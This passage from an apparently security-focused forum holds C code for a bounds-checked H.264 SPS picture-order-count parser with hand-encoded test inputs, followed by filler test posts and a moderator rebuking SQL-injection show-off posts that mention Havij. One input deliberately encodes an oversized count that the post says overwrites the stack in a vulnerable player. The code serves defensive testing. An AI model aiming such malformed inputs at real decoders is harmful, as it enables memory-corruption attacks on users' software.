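        suffix = (suffix << 1) | bit;
    }
    *out = ((1u << zeros) - 1) + suffix;
    return 0;
}

/* se(v): k = ue(v), mapped to (-1)^(k+1) * ceil(k / 2). */
static int read_se(bitreader_t *br, int32_t *out) {
    uint32_t k;
    if (read_ue(br, &k)) return -1;
    *out = (k & 1) ? (int32_t)((k + 1) / 2) : -(int32_t)(k / 2);
    return 0;
}

typedef struct {
    uint32_t pic_order_cnt_type;
    uint32_t log2_max_pic_order_cnt_lsb_minus4;     /* present when type == 0 */
    unsigned delta_pic_order_always_zero_flag;      /* the rest when type == 1 */
    int32_t  offset_for_non_ref_pic;
    int32_t  offset_for_top_to_bottom_field;
    uint32_t num_ref_frames_in_pic_order_cnt_cycle;
    int32_t  offset_for_ref_frame[MAX_REF_FRAMES_IN_POC_CYCLE];  /* fixed-size, like the player's buffer */
} sps_poc_t;

/* Returns 0 on success, -1 on truncated or malformed input, and -2 when the
 * decoded count would overrun offset_for_ref_frame (refused before any copy). */
int parse_sps_poc(const uint8_t *buf, size_t len, sps_poc_t *sps) {
    bitreader_t br = { buf, len * 8, 0 };
    unsigned bit;
    if (read_ue(&br, &sps->pic_order_cnt_type)) return -1;
    if (sps->pic_order_cnt_type == 0)
        return read_ue(&br, &sps->log2_max_pic_order_cnt_lsb_minus4) ? -1 : 0;
    if (sps->pic_order_cnt_type != 1)
        return 0;                                   /* type 2 carries no extra fields */
    if (read_bit(&br, &bit)) return -1;
    sps->delta_pic_order_always_zero_flag = bit;
    if (read_se(&br, &sps->offset_for_non_ref_pic)) return -1;
    if (read_se(&br, &sps->offset_for_top_to_bottom_field)) return -1;
    if (read_ue(&br, &sps->num_ref_frames_in_pic_order_cnt_cycle)) return -1;
    if (sps->num_ref_frames_in_pic_order_cnt_cycle > MAX_REF_FRAMES_IN_POC_CYCLE)
        return -2;                                  /* the missing bounds check */
    for (uint32_t i = 0; i < sps->num_ref_frames_in_pic_order_cnt_cycle; i++)
        if (read_se(&br, &sps->offset_for_ref_frame[i])) return -1;
    return 0;
}

/* Constructed inputs: hand-encoded Exp-Golomb bit strings, not from any real file. */
static const uint8_t SPS_OK[]    = { 0x42, 0x99, 0xA6 }; /* type=1 flag=0 -2 3 count=2 {1,-1} */
static const uint8_t SPS_OVER[]  = { 0x4C, 0x02, 0x02 }; /* type=1 flag=0 0 0 count=256 */
static const uint8_t SPS_T0[]    = { 0x94 };             /* type=0 log2_max...minus4=4 */
static const uint8_t SPS_TRUNC[] = { 0x42 };             /* cut off inside the first se(v) */

int main(void) {
    sps_poc_t sps;
    int rc = parse_sps_poc(SPS_OK, sizeof SPS_OK, &sps);
    printf("ok:    rc=%d count=%u offsets=%d,%d\n", rc, sps.num_ref_frames_in_pic_order_cnt_cycle,
           sps.offset_for_ref_frame[0], sps.offset_for_ref_frame[1]);
    printf("over:  rc=%d\n", parse_sps_poc(SPS_OVER, sizeof SPS_OVER, &sps));
    printf("trunc: rc=%d\n", parse_sps_poc(SPS_TRUNC, sizeof SPS_TRUNC, &sps));
    return 0;
}
```

With a count of 256 the hardened parser returns -2 before touching offset_for_ref_frame, whereas the loop in the disassembly keeps storing one 4-byte value per iteration for as many iterations as the decoded count demands, which is the stack overwrite the post describes. The truncated input shows the other failure mode a decoder has to handle: running out of bits mid-field must be an error, not a read past the buffer.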
  21. Nytro

    Test

    dsfsdfdsfdsfdsf
  22. Nytro

    Test

    ghjghj
  23. Yes, interesting idea, such a utility could be very useful.
  24. We have a category called "Cos de gunoi" (Trash bin) where we move all the rubbish. You posted some two-bit links, I don't see what that would be doing in Show-Off. Did you at least extract the database version? You go to a link, put in a quote and you are 1337. Or put that link in Havij and you are 31337. I will hand out bans for rubbish like this.